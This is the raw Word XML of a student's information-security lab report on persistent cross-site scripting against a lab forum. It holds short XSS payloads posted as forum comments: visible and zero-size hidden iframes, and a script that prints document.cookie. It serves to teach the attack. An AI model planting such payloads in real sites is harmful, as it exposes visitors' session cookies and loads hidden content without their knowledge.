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header1.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.head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807460" cy="3011170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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le"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>HIT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>Introduction to Information Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:cs="Lohit Hindi" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="72"/>
          <w:lang w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Lab 2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lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1403201</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Student number</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1130320118</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:hanging="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Name</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Yang Yi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Purposes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:firstLine="420"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Understand what is XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Learn the requirement of XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Learn some method of XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="华文行楷" w:ascii="华文行楷" w:hAnsi="华文行楷"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Procedure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Learn how to use the bbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">login windows and open </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://10.1.1.2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="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265430</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>50800</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4740910" cy="266573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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>leave some massage on the site</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="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318135</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>125095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4658995" cy="262064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9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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/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Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Persistent XSS test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Open the bbs</w:t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323850</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>149860</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4688205" cy="263715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0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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write scripts in comments</w:t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393700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>136525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4712970" cy="265112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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>submit and watch</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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292100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>169545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4822825" cy="271272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82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>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thinking :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">When other user open this site , the scripts will run if his </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="__DdeLink__104_1282748787"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The  scripts run , because the site don’t </w:t>
      </w:r>
      <w:bookmarkStart w:id="1" w:name="Contextual_output_encoding.2Fescaping_of_string_input1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>escap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>of the comments , so the browser run it  as  JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:ind w:left="1260" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr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409575</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>83185</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5097780" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="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Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>The simple apply of persistent XSS vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Leave a comment and change the content to : &lt;iframe src="http://www.hit.edu.cn"&gt;&lt;/iframe&gt;</w:t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154940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5027295" cy="282765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29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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>test the effect</w:t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284480</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5076190" cy="285496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9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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>change the comment to:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>&lt;iframe src=http://today.hit.edu.cn width="0" height="0"&gt;&lt;/iframe&gt;</w:t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276860</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>327025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5128260" cy="288480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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:ascii="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">it don’t display </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">today.hit.edu.cn , because the size of the window had been set to </w:t>
      </w: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171450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>652780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4908550" cy="2760345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>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ero</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use persistent XSS to session cookies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">leave comments to the site, add statement: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>&lt;script&gt;document.write(document.cookie)&lt;/script&gt;</w:t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-24130</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>258445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5352415" cy="3011170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41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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>the result is :</w:t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29210</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>147320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5245735" cy="2950845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3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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Administrator login and check what is different</w:t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181610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>65405</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5144135" cy="2893695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numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="0"/>
